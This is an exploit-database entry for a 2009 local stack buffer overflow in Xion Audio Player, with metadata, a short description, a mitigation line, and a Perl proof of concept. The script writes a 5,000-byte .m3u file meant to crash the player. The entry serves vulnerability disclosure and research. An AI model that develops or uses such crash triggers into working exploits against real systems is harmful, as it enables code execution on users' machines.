header-logo
Suggest Exploit
vendor:
Xion Audio Player
by:
Dragon Rider
7.8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Xion Audio Player
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2009

Xion Audio Player(.m3u File) Local buffer Overflow PoC

Xion Audio Player is vulnerable to a buffer overflow when a specially crafted .m3u file is opened. This can be exploited to cause a stack-based buffer overflow by corrupting the memory of the application. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.

Mitigation:

Update to the latest version of Xion Audio Player.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#=====================================
#Xion Audio Player(.m3u File) Local buffer Overflow PoC
#download:http://www.brothersoft.com/xion-audio-player-download-49404.html
#=====================================
#Author:Dragon Rider
#contact:drag0n.rider(at)hotmail.com
#=====================================
#tested on WinXp SP3

my $crash = "\x41" x 5000;
open(myfile,'>>DragonR.m3u'); 
print myfile $crash;

Navigation

Suggest Exploit

Services By CQR